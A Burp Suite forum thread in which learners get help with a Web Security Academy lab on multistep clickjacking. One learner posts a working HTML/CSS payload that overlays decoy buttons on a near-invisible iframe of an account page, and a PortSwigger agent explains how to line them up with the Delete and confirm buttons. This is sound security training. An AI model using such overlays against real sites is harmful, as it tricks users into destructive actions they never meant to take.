Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

multistep clickjacking

shubham | Last updated: Feb 01, 2022 07:06PM UTC

<style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position:absolute; top:410px; left:60px; z-index: 1; } .secondClick { left:60px; top:510px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://ac3d1fd71f177443c078af8700590090.web-security-academy.net/my-account"></iframe> i m stuck at this lab tried 10 times , please help

Ben, PortSwigger Agent | Last updated: Feb 02, 2022 08:45AM UTC

Hi Shubham, The exploit that you are entering within the Exploit Server is not meeting the requirements to solve the lab - have you used the 'View exploit' functionality in order to double check that the 'Click me first' element lines up with the 'Delete' button and the 'Click me next' element lines up with the 'Yes' button (used to subsequently confirm that you wish to delete the user account after the 'Delete' button has been pressed)? From the values that you have used, it looks like the 'Click me first' element is lined up with the 'Update email' button and the 'Click me next' element is lined up with the 'Delete' button (which is incorrect). The written solution provides a good guide on how to do this if you are stuck.

Adrian | Last updated: May 22, 2023 12:22PM UTC

Hey, the issue I face with this lab is that it appears to show login page instead of /my-account page. Even if I watched few video online and doing the same the issue is with appearing /login instead of /my-account. In this line: <iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe> it redirects in "view exploit" to /login, but not my account which is strange.

Ben, PortSwigger Agent | Last updated: May 22, 2023 01:06PM UTC

Hi, Have you logged in prior to creating your exploit?

Adrian | Last updated: May 23, 2023 10:46AM UTC

Hello Ben, Yes, I've been following the steps 1 by 1 multiple times and still encounter this issue. We are working on it with my colleague and he is receiving the same issue on his side. Could you please look into it.

Ben, PortSwigger Agent | Last updated: May 24, 2023 10:07AM UTC

Hi Adrian, As noted in the lab, are you trying this using a Chrome browser to mimic the victim user? If I use the embedded browser, log in to the lab and then configure my attack (making sure to view the exploit to confirm the two click elements line up with the requisite buttons) allows me to successfully deliver the attack and solve the lab.

You need to Log in to post a reply. Or register here, for free.